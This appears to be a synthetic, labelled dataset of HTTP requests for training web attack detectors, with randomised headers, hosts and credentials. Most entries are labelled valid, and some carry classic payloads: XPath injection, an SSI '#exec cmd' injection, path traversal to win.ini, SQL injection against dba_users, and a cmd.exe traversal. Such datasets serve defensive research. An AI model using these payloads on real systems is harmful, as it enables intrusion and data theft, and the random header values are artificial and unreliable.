If-Modified-Since: Thu, 26 Aug 04 19:33:56 CET
If-Unmodified-Since: Wed, 03 Oct 07 21:09:13 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 51
MIME-Version: 8.5
Pragma: f=taisu
Proxy-Authorization: 7aei tsnne=rLhupn
Authorization: Digest nc=eecd558D
Range: -839517
Referer: http://eNrnviz.gov/edyswtG9/scScrap/icton/phimhir/nne3cDn.asmx
TE: deflate;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.7 (Windows; U; Win 9x 7.1; nt-ag; rv:5.8.9) Gecko/55496920
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 669x1617
Via: FTP/2.1 www.E4bc.html:3
Transfer-Encoding: compress
Upgrade: skshm/6.0, Eli4h/5.0, ltb/8.7
Warning: 942 250.5.20.192 "brnistmyZweTt" "Tue, 13 Apr 10 19:40:14 UTC"
X-Forwarded-For: 40.157.103.88
X-Serial-Number: 27066605
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

6re8dsn4s=fNdrti):i |um&eertppieumr=sU7Kfkuo&wexecformHuBH1=phpe&osedoO0asiIuii=eSo0htainmrDeht&0dZ0v=tbQG@&objectG65OgEoww=sN7d.tJ&nBalieoafakens=68&oieTsazOseA=eq11m1&trormvlen=a3o&m7wsMcieosE=4beqadmin&bi=]?srenregltno&nt3eiEpn=6672&evichst0t=78484194&Yz7ZoS=07630

End - Id: 7811
Start - Id: 22282
class: Valid
GET /47xz6Ze6@GOZ_o/lrNdjLCMb.PoIsCxRYcK/Wi5@/dtr6doIprype0iqi/fj43b_/u5eddh8/3C9OYt5ofWKQy/T9OZUyI/v7D9r/eft/tA9c/mTz1DpLu.php4? HTTP/1.1
Host: www.93sdenDpoe.gov
Connection: r6uslloo
Accept: text/html;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.8, deflate, gzip
Accept-Language: hd-ndts;q=0.6
Cache-Control: only-if-cached
Client-ip: 114.15.187.15
Cookie: v1aB8wwchild._M=55460274
Cookie2: $Version="03"
Date: Wed, 16 Mar 05 22:11:33 GMT
ETag: W/"gRsjDZ5Nlf08ZOvAVmCU"
Expect: 100-continue
From: jrelt@iwvwb.ch
If-Modified-Since: Fri, 17 Feb 06 11:09:37 UTC
If-Unmodified-Since: Sun, 08 Mar 09 09:03:53 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Apr 07 20:29:48 CET
Max-Forwards: 1927
MIME-Version: 1.0
Pragma: 0aaca='fe'
Proxy-Authorization: Basic bnRxbzplbHNo
Authorization: Basic aWltdGRsb2Y6bmdPYWE=
Range: -562840,-898,-800
Referer: /s61armeR/82th/tifWtti/rorriht/ydtrnpi7.pl
TE: trailers,chunked,deflate
Trailer: Expect
User-Agent: etrkgflk4 (gMkq-IuB.I; n0pSIYB; ujGPv7h)
UA-CPU: 68000
UA-Disp: 0876,9361,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 797x590
Via: FTP/0.1 6.33.47.119:144, 7.8 www.srURrL.gif:7404
Transfer-Encoding: compress
Upgrade: Buq/9.2, d3soer/1.1, sup/2.7
Warning: 228 172.64.227.11 "cAccunayserl6Fzym6rn" "Wed, 02 Jan 08 09:41:05 UTC"
X-Forwarded-For: 111.239.10.121
X-Serial-Number: 35178476793
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22282
Start - Id: 24828
class: Valid
GET /ehifHe/uhhzeaelwsa.cfm?c6SV1aVC=heaiahnr1llYFaf5&naaohniroawD=iveJaaooh1e&nagpnoxreng=33&rselectPnullXcopyqm_mS=SxxtermE&3etTMp2tomasnn=inAal&eftOsTSdyl=xie HTTP/1.1
Host: 209.165.79.110
Connection: fee0
Accept: */*;q=0.2
Accept-Charset: iso-8859-8-i;q=0.4, iso-8859-2, windows-1250, windows-1250, x-mac-roman
Accept-Encoding: identity;q=0.5, identity;q=0.5, gzip
Accept-Language: *
Cache-Control: vadda='stx'
Client-ip: 63.224.181.72
Cookie: otlo=61216815;FIcn=nseoca;rmUK5M1=DmumnuhttpIndsoeqi;etdm2dtdtposrs=sCzqVX0KaOjM;-pkQVbinphpRhservicesX=f3JFBwk
Cookie2: $Version="7"
Date: Tue, 08 Dec 09 13:12:59 GMT
ETag: W/"WPZIjKrEjvLm0ecB"
Expect: 100-continue
From: pg0kwiy@2weD8er.de
If-Modified-Since: Tue, 30 Dec 08 12:35:03 CET
If-Unmodified-Since: Tue, 19 Dec 06 19:25:22 CET
If-Match: "6yEm4k1JRd3hR7LK"
If-None-Match: "1Ib@gHPhQoOa83.UqBpu"
If-Range: Mon, 04 Feb 08 16:47:27 UTC
Max-Forwards: 39
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: eavp 4smsS=trdyaIt
Authorization: Atrp 2ftt=Eisoiem
Range: 89-,-8
Referer: /nvextses/bLnfryae/oee7/iseno/cerez.gif
TE: deflate,gzip
Trailer: Date
User-Agent: Mozilla/8.4 (Windows; U; Win98 7.7; se-te; rv:7.3.6) Gecko/20768918
UA-CPU: x86
UA-Disp: 9323,238,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 577x412
Via: 4.7 www.mfso.js:614, FTP/3.5 217.212.26.66:715
Transfer-Encoding: eOi1w
Upgrade: slnd/7.7, n2now4/3.0, 8Sk/4.7, tIrah8/3.8, Nnodwe/5.3
Warning: 185 www.aas8co.jpeg:420 "Njalea" 
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 2608938544154146397
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24828
Start - Id: 35726
class: XPathInjection
GET /psiod5wnwaounBxfezie/aLeslh6umse7e/nUf2@FykGb6NNd.sO/p@.css?tg=wda%27%5D+++%7C+++P+%7C++%2F%2Fuser%5B++name%2Ftext%28+++%29%3D%27tqjac&mppceeo=1496598&Eyeanxv=l9Vnh&Fgaireil0h=scriptejhtpassdropt&Xocm=lOgy&maAae=boa9tpm&q7d72gfadmrcf=tulo&86mti8e8yiS=hEim- HTTP/1.1
Host: 198.227.108.1
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tmp-somiCi;q=0.4, tn1aNNE-pwteiy
Cache-Control: Ox='dtx'
Client-ip: 41.165.190.48
Cookie: rrr1=94796;xhvs-cHI=Jo@hi;ihCmS7SInodeLY=4688481
Cookie2: $Version="001"
Date: Fri, 11 Mar 05 14:37:17 GMT
ETag: "u39oPyKWUUBlk8Zb"
Expect: 100-continue
From: nptt@ai166.st
If-Modified-Since: Sun, 17 Sep 06 18:43:29 UTC
If-Unmodified-Since: Sat, 26 Jul 08 21:07:57 GMT
If-Match: *
If-None-Match: "MJH4Cnx74O.7P@z."
If-Range: Fri, 18 Sep 09 01:06:22 CET
Max-Forwards: 94
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM Z3Ntc2hscmZlTk5vc3JpYWVsYWVubGV0SWVhZ25lTXNueDl3c2VOeXN0cGVybnJh
Authorization: Basic c0VlYnJ3aWk6RThjcldoNQ==
Range: -0128,0-7163
Referer: /owseepts/ehTet/me5mb.gif
TE: trailers
Trailer: TE
User-Agent: hKjxXD9vsW http://www.Naflgzt.be
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: FTP/5.2 www.H4eDEklt.jpeg, 4.5 20.195.110.230, HTTP/2.5 www.ensg.js
Transfer-Encoding: eeteh; aiogdsco=Aooapajc
Upgrade: odee/0.3, hong/9.6, eeicao/8.3
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 126041771570096080
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 35726
Start - Id: 18833
class: Valid
GET /6QFZtmuCNfug1j0Pp/nt/_HUIwOoLDF/eNtm/dGAnR/preeagseaiteta/dnet/eseeafamobo8Hof4/el0raeec2sBedas3du/qt75zXWmoWU.I/th@qd5b5QM6HB/KVkrm.html?isr=siyapocrl%2F HTTP/1.0
Host: 113.91.247.247:4396
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: teyizbyf-etl
Cache-Control: no-transform
Client-ip: 208.166.219.41
Cookie: rng=e8Ncmda;roo7tbOt=0rth2uo;jagzi=4s5nTnl4k7fVn
Cookie2: $Version="095"
Date: Sun, 04 Jul 04 09:30:27 UTC
ETag: W/"qB@Ea31vyZ0pjGeJh8"
Expect: 100-continue
From: eiaotdi@tdsHiKyi.biz
If-Modified-Since: Sat, 13 Dec 08 22:30:46 CET
If-Unmodified-Since: Thu, 22 Oct 09 13:47:10 UTC
If-Match: *
If-None-Match: *
If-Range: "I_h9tIf61.mBJwygfs"
Max-Forwards: 315
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: ishl 5ute=bsrhted
Authorization: Digest response="8C02AC0dF76A450C575CD9aeFACeccEf"
Range: -9,1224-02
Referer: /egnehoa/etipeks/0orv/a0gn3f.shtml
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.6 (X11; U; Open BSD i586 0.7; mc-Ts; rv:4.2.7) Gecko/05198603
UA-CPU: x86
UA-Disp: 888,993,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4147x8311
Via: 9.0 83.118.95.38
Transfer-Encoding: compress
Upgrade: saO/9.8, oapyT/9.3, zrdrev/7.9, dar7eo/8.4
Warning: 106 www.dh2mlt.jpeg "hscobuAtozegsiEt" "Fri, 20 Jul 07 24:32:32 CET"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 0589105482767734530
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18833
Start - Id: 11835
class: Valid
GET /dvZ_aJl33NZ26aSQ/NdTgroup byCBacceptnqsuRautoexec/z3NaFAleIJDByZ3/tKQc99cInY@Pl/phtatOw9dzn/GNmailB/ApDefe1lnvtEaah.png?@ihtpassq_3N=rthi&i3Dw69kx=+t&oens5pql=dAnppStit&snN1ooif=en&E14ctetcn4atn=a0P&eoTtmEnn=9607799054&nmsealAsM=9672&6p76erdeeoeNim=7 HTTP/1.0
Host: 121.228.245.113:80
Connection: ontmjt
Accept: image/*, text/*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 144.242.117.107
Cookie: E77bChqyZ=ahtdn;tamuGe4palrner=t2I9Exm8;ho5nVtnisOn3eu=<rueeosccS1;htyysfttv39oar=noCpscyt;1aisae1=u40el( rthth
Cookie2: $Version="845"
Date: Mon, 10 May 04 01:54:02 UTC
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: fiidM
From: raeRsdn@ezgoodi.biz
If-Modified-Since: Mon, 05 Apr 04 21:22:52 GMT
If-Unmodified-Since: Sun, 31 May 09 03:54:44 CET
If-Match: "4Shs6e4Rf2kmm1l"
If-None-Match: *
If-Range: *
Max-Forwards: 4733
MIME-Version: 1.6
Pragma: gos3e1=6ngTsmi
Proxy-Authorization: NTLM cndlYVQ0cmVvbnZyZWxyaW50dHRhaXJ0dGx2bnNhb21iaQ==
Authorization: NTLM d2s4bXB0dG5GYXdtbml0MnRpT25rZTJrdGxybDhNZ29p
Range: -9087,256-
Referer: http://yeuxtE.cz/xttE/ut0i/lydR/ul8sooh/exeeih.tar.gz
TE: deflate,trailers
Trailer: From
User-Agent: Mozilla/7.4 (X11; U; SunOS sun4u 9.7; pN-to; rv:1.7.1) Gecko/34590370
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 045x0190
Via: 1.2 www.ed7r.htm, 5.5 www.c4dr.png
Transfer-Encoding: gzip
Upgrade: qeona/2.2, e3aae/0.6
Warning: 779 www.runsnon.css "al5s6npNr3oe0Heo" "Sun, 08 Mar 09 02:18:33 CET"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 63208652767395
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 11835
Start - Id: 39912
class: SSI
PUT /0.fZHb/YYvL9echoEobjectunionyB7.tiff? HTTP/1.0
Content-Length: 178
Content-Language: 7n,i
Content-Encoding: deflate
Content-Location: /eOp6Ipt/o9stnp.jpg
Content-MD5: V2w3bHJib3hubmVVMnNhcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jan 08 15:13:36 UTC
Last-Modified: Sat, 01 Jul 06 13:39:32 UTC
Host: www.ehejial7so.cz:80
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad, x-mac-japanese
Accept-Encoding: compress
Accept-Language: *;q=0.7
Cache-Control: nnsur='d'
Client-ip: 239.36.31.16
Cookie: b1p=bo
Cookie2: $Version="418"
Date: Thu, 10 May 07 02:37:53 GMT
ETag: W/"KujfBaJYEnNh-svZHP"
Expect: cs2a2eya
From: etiwhOvt@03yWr.net
If-Modified-Since: Fri, 07 May 04 13:17:19 UTC
If-Unmodified-Since: Sun, 08 Jan 06 03:08:14 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
Pragma: aed5=ead
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: /oesnmEFv.rar
TE: trailers,chunked;q=0.2
Trailer: Trailer
User-Agent: Mozilla/9.5 (Windows; U; WinNT 9.0; ix-hb; rv:2.3.5) Gecko/44137444
UA-CPU: StrongARM
UA-OS: Win9x
UA-Color: color16
Via: HTTP/5.8 161.47.96.155
Transfer-Encoding: deflate
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Serial-Number: 2450299915461461
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

Ktps2ajigpry=140&tOtbeO=<!--     #exec  cmd="/bin/ls  -l /home/ohkwa/n4rao7"    -->&o67mvbt4uk=a5NzsiAde3r&9hRi5Ss=rldestIlnn8e0O&Ps8z.=nAyYk&cb6ySUcG=599

End - Id: 39912
Start - Id: 45468
class: PathTransversal
GET /oe1w/qSnite1wSIBeteeit/yqVh@4wiN7u/mZ30vURp8FPimgK/blne/9bsor/JZhRtHu/tsryifb4xrn3dT/nipf4yBMBni8/L_copy@bQN/t-JRlF/e7jr9wf.msf?zac5hNrr1AnoY=At&de2a=27&9IX.JG0d7UE2u=e%3A%5C%5CWINNT%5C%5Cwin.ini&hoWmntaseiepar=03&aieeerttrRoti=z%25&rRu=ola HTTP/1.1
Host: www.oao6l.st:0
Connection: orsliwpp
Accept: video/*;q=0.3
Accept-Charset: iso-2022-jp, iso-10646-ucs-2
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 60.160.46.41
Cookie: hFfinsert=6513;8eedpe=68381;AbsgpLpe=wIp5whwWientstdingf;5sean4eum2o=06;n9WdOHRr8=40775
Cookie2: $Version="526"
Date: Mon, 11 Jan 10 12:21:12 GMT
ETag: "Omu@QDU3nzKwBGlFA0"
Expect: oeHeal=trnOeys6
From: 9lho@aiRe.net
If-Modified-Since: Sat, 17 May 08 16:21:34 GMT
If-Unmodified-Since: Fri, 18 Dec 09 07:02:44 UTC
If-Match: *
If-None-Match: "5yLmK20fyd55FHb"
If-Range: Sat, 28 Nov 09 22:18:21 GMT
Max-Forwards: 408
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ohi4
Authorization: Digest uri=http://www.aeed.net/2toh/ctezt.mpeg
Range: -23,7962-,63876-540949
Referer: /ciia.js
TE: deflate,trailers,gzip
Trailer: Warning
User-Agent: Mozilla/0.2 (X11; U; Linux i586 5.2; Io-6y; rv:2.3.1) Gecko/95086002
UA-CPU: x86
UA-Disp: 8084,8855,16
UA-OS: Win98
UA-Color: color8
Via: FTP/6.1 50.246.134.210, 8.0 80.80.231.46:6, 4.9 172.134.189.2:0
Transfer-Encoding: deflate
Upgrade: drf/1.3, eoe/9.9
Warning: 016 www.lea2ce.html "yMifIhorneae" 
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45468
Start - Id: 41318
class: SqlInjection
GET /tE0hssrinludisduso5d/riJAd1I4anrp/eM/E7tvnlnxrc1lh/ro@Y-C/l5hpiaofedna/cpjoaniim6top9lnLcet/enTNlS5/binj50/momhdaa92c1Entw7c/lH.ixj/netcataNOautoexect7H8G4.swf?necs=1&mds0tcgc=t&iti0maui8iwe=Ct39c8&e8er3Meimsucwu=06274&ginvyeft=4&mciq5v3DN8t=8655&l8eyotEgo=ioe&inaf1lt=el4pE6t&IK2pupdatehttps=tst6G+bdznt+p-t9g HTTP/1.0
Host: www.epqdew.net
Connection: close
Accept: application/postscript;q=0.9, application/rtf;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: n=9v
Client-ip: 189.55.45.50
Cookie: tmo5si8=wI1oeuaOlOei;8dnssoso8antsh1=1604301;8tnnetTproh9el=elmp'/**/UNION/**/SELECT/**/ztb/**/FROM/**/dba_users/**/WHERE/**/c79us/**/like/**/'%25;rbnOweeCm1iioo=toe
Cookie2: $Version="7"
Date: Wed, 14 Nov 07 13:41:33 UTC
ETag: "lWYYbQ-U9x3sNFga"
Expect: 100-continue
From: jtwc@er22t6e.st
If-Modified-Since: Wed, 14 Feb 07 02:19:15 UTC
If-Unmodified-Since: Mon, 30 Jun 08 24:27:36 GMT
If-Match: "myRIgdW9EyXxQrO9VM"
If-None-Match: *
If-Range: "kRsDH9J48B66QuEX.CJ9"
Max-Forwards: 662
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic bm9lSDpDZWN1
Authorization: NTLM dFNhbmlsdWVDcE9lYW9pdHVzbzJybnRvMW9vcXBoTXll
Range: 227201-2410,49431-80,697388-
Referer: http://haearsun.it/tdGji5do/eHrtnSe/a8F5inA.nsf
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.7 (compatible; 0dcdsiU; Unix; urc4ta; 7h3mlst)
UA-CPU: PowerPC
UA-Disp: 111,881,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9326x2155
Via: 5.7 www.rtntsnyn.html
Transfer-Encoding: identity
Upgrade: Ylhk/4.7
Warning: 606 67.137.176.51 "isNlwel" "Sat, 21 Oct 06 12:47:41 UTC"
X-Forwarded-For: 93.157.11.88
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41318
Start - Id: 2550
class: Valid
GET /oyheesayfbn3ss5ltie/cowxaMGq_zWYu0aba/ewJqhJKlcIS/siejiemwr/OIarune.dll?mxdtsTNorL=%278y+i%257emlnetcat HTTP/1.1
Host: 83.165.42.178:615
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, iso-2022-kr, iso-8859-6, windows-1258;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 88.168.88.157
Cookie: mthTsennTaregq=7857;tsbipa8=w E[d;Fc-RkX2=6412455;ei2eeevtTtmye=523024;DiIieea3n=rtm6oesulHsHta
Cookie2: $Version="894"
Date: Sat, 09 Sep 06 20:44:07 GMT
ETag: "1mWuwrLI_9m7NiiGqUnm"
Expect: 100-continue
From: ofHrc@8cET.be
If-Modified-Since: Wed, 14 Nov 07 04:41:04 UTC
If-Unmodified-Since: Fri, 03 Sep 04 07:03:06 UTC
If-Match: "yy8iptqSaV.mYmXXosY"
If-None-Match: "YxUWuBiGU0.BnZNe"
If-Range: Fri, 29 Jun 07 05:02:24 CET
Max-Forwards: 992
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic bHVyZXNTOmFhZWVy
Authorization: Basic eWdpdHQ4YW06d2FxZQ==
Range: 528055-4989,-6
Referer: /stseaoa/Agrbsw/hadnfou/f7eb/aIruo.shtml
TE: chunked;q=0.3,trailers
Trailer: If-Range
User-Agent: 4ilnto/8.4
UA-CPU: x86
UA-Disp: 7814,3567,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 266x8527
Via: e7csfc/0.3 209.236.72.166:3, 4.7 www.biee.gif
Transfer-Encoding: compress
Upgrade: ms8e/5.5, bc0udr/8.6
Warning: 953 www.h8zy.png "teAfk" "Tue, 09 May 06 12:50:35 CET"
X-Forwarded-For: 237.59.187.114
X-Serial-Number: 8053339262095703049
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2550
Start - Id: 29724
class: Valid
GET /mbxmjOgrsettJsiohwee/rN_jE@.Z9zmqfvPY.mdb?2punjonuuia7an=3ot%28d&Fc2LozZ2Xp=oi9ons&75kthnogam3=0whgx&HF_vp-UIF0cb=5praea&0n=gm+var&Syh7n8prnid=%27vese&eerioierel4m=567968&abw=zmCptqJtb&ia9=551062&CbedigeaNfeiegr=78882466&w2rtm7e=sjTdmeienb&fcpneSuhxvbG7=35&dyedoy=4kSUyuN1 HTTP/1.1
Host: www.jpmhrIwlce.biz:995
Connection: close
Accept: image/gif;q=0.7
Accept-Charset: windows-874;q=0.5, euc-tw;q=0.8, utf-7;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=9248
Client-ip: 183.28.171.106
Cookie: YH-.IW2boot.ini=oDacmdlh$d>elErsiery;otiank=(w4egroup byo0ar6oh2h;cwaFohasssacnu=hcsett16xlo92a:;leillheiFexa=ue;hursmS8tegpn1po=ohobe-i/a;7ssogine7A=1804222
Cookie2: $Version="061"
Date: Thu, 15 Dec 05 06:43:19 GMT
ETag: W/"-V4WwGdxwEokSj2CN"
Expect: diebe
From: nrmoch5@tnieiSbE.com
If-Modified-Since: Sun, 24 Jul 05 03:06:59 GMT
If-Unmodified-Since: Sat, 30 Dec 06 14:26:37 UTC
If-Match: "-npcYNkrH8Kp5-qOUr6n"
If-None-Match: "J0BZVr38p-EWlqy"
If-Range: "kcDI7gwH@Bh6ik0BrX"
Max-Forwards: 440
MIME-Version: 3.4
Pragma: rt4kN=ts6s
Proxy-Authorization: Basic d2NpZnRyeTpvdFVnZWxocw==
Authorization: ootai ytrdsee=hhwhfeo
Range: 8-,7343-94485
Referer: http://xSensreo.it/krugde8i.php
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.6 (compatible; MSIE 2.2; Solaris; cehJitnpn; sidjfb5Y)
UA-CPU: MIPS
UA-Disp: 0925,6962,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1488x053
Via: 4.8 247.29.234.214:48591, 4.4 230.146.73.233:2, 9.7 www.IdsHcer.tiff:787
Transfer-Encoding: deflate
Upgrade: mOze/0.8, daji/4.9, odn/5.9
Warning: 520 167.29.73.134 "smwarc7uRes0do" 
X-Forwarded-For: 240.221.237.220
X-Serial-Number: 23055692041391368156
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29724
Start - Id: 36490
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.s1poSSrs.com:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-japanese;q=0.2, koi8-r, x-mac-arabic;q=0.5, cp-936;q=0.6, euc-kr;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 219.137.139.146
Cookie: flEA=hlib1se;tawiteenmei=iomh
Cookie2: $Version="984"
Date: Sat, 30 Aug 08 10:27:38 CET
ETag: "EEjfH1qoZefe@m2kmR"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Sun, 26 Sep 04 13:52:36 GMT
If-Unmodified-Since: Wed, 26 Jul 06 01:18:34 GMT
If-Match: "8NqOGhZtd.10osrYsCUi"
If-None-Match: *
If-Range: Thu, 17 Aug 06 17:47:41 UTC
Max-Forwards: 960
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: NTLM YXZ2NmcxYTE0aHJodG9vZWxlcGFoamk2aG5kYU9uaXVjZUdhM3dVaG5ucml5Yw==
Range: 998505-,-0540,815-
Referer: http://esn9w2.uk/bp6dRep.gif
TE: trailers
Trailer: If-Modified-Since
User-Agent: nMsYnCBpS_ http://www.d4iA.st
UA-CPU: MIPS
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 512x1298
Via: FTP/1.6 www.eeahm8my.htm
Transfer-Encoding: identity
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36490
Start - Id: 26455
class: Valid
GET /atIc8blgaheloa/pip-JGd4K_0_OPr4jGnd/o0QjhbjErmjY/ei/U6TObCRVEVRv5/QYror.jpeg?nbt=hiM_j-x&dEr2Ctelnetw=iy7naalxeeoe&AqJLlinkSeD3=ncasidd&DHprocessing-instructionjP=duti&IbexzEehid7eufe=iJpz8QGJuZ1&9ezlooenNNt1a=W%3AurItdand+wrtthrtr%5B%40&@1child9=tXwl%40&cesFasUthoaI=65140683&nEthlboaWd6e=58&l0eeEnidwjwe=ihVEuc9MjpU_ HTTP/1.1
Host: 33.153.192.227
Connection: brntal
Accept: text/*, video/*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: compress, deflate, compress
Accept-Language: sdC1-rmavbe;q=0.4, dsolrx-oa;q=0.9, ig0-28be, 7nors0o-o;q=0.9
Cache-Control: ep='sXnmraE'
Client-ip: 38.220.231.237
Cookie: mtsNn=ya0;eEiuca4n=41824155;vrli7hg3dPeceqn=]bssliba]4hnandaall2tIbetweene;ZnflNeEn==rn;rpboUd=96;G@x7OuJimDe=cMsUh
Cookie2: $Version="56"
Date: Sat, 04 Oct 08 01:05:58 GMT
ETag: W/"aH2jp.pfySLbmKqBQ"
Expect: tqsfeEqs=itaeDa
From: ozaw@hYEsodt.net
If-Modified-Since: Mon, 26 Mar 07 14:07:00 UTC
If-Unmodified-Since: Thu, 16 Sep 04 24:57:25 UTC
If-Match: *
If-None-Match: "K7SUo4b0WgbgrVwAeoG"
If-Range: "zvbtGWGZjTGL_WP5"
Max-Forwards: 1
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest username="tmff8btS"
Authorization: NTLM d0NlZG9hdTNjdEhyb2V0NGFFYWxmZ2dlZnRpUmtob2VQZ0llbmVu
Range: 31-37154,2-
Referer: http://www.deiDmFcT.ch/e67t/mdnllq0r.cfm
TE: trailers,gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/6.9 (X11; U; Open BSD i586 0.2; 55-hs; rv:2.5.8) Gecko/39180485
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 326x7197
Via: sOi/8.4 195.231.110.54, 2.8 49.89.56.192, 5.1 189.84.34.175
Transfer-Encoding: deflate
Upgrade: tnIK/1.2, bsE/9.7, lds7uO/7.7
Warning: 220 www.o3thefd.html "7cronrpc" "Thu, 19 Apr 07 17:54:26 UTC"
X-Forwarded-For: 189.141.174.39
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26455
Start - Id: 21055
class: Valid
GET /nVIPnBaq85MIjoI/ttapaXlgenpdas/emoereGUoesathc3mw/oEBjo43/oaioatss2nmaw/nATPk0/aQ2Nt.php3?W3x3uuSB=ifqAw5_u8y HTTP/1.1
Host: www.nmkj1alo.org
Connection: oasa
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: epdivo-haitoe;q=0.8, isc-ur, eeltt-naheif, mhe-rlllq, fnaczRe-rE8ui
Cache-Control: min-fresh=27338
Client-ip: 226.117.147.113
Cookie: Metdia9fdatz=4;zCaE=irn7l;3a9qthnn=rdNeoor udelete-hzo;sepbm=6895514422;cPh=ir8hza
Cookie2: $Version="462"
Date: Thu, 08 Feb 07 02:44:51 UTC
ETag: "k@AvUbctkJuLphJJw_fG"
Expect: 100-continue
From: uo8i@oteEttyH7e.gov
If-Modified-Since: Tue, 29 May 07 13:49:46 UTC
If-Unmodified-Since: Sat, 24 Sep 05 11:41:52 UTC
If-Match: "JHMAJmx_8EQ6lY9yNq"
If-None-Match: "rbNCvsv90zI1H8vVOyu"
If-Range: *
Max-Forwards: 85
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: NTLM eWVlUmZhYXFsdXRvMjhPY2VnVGUzZ2FoaUFlc2VvRWVp
Range: -8328,1-547612,1890-
Referer: http://www.tspsJita.gov/fxaai.doc
TE: deflate
Trailer: If-Modified-Since
User-Agent: eriucfl (dEOxOhA4Mg; bGRsZIq; a-eR1NYkm_; n.p87ag4c)
UA-CPU: 68000
UA-Disp: 2624,2413,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 523x776
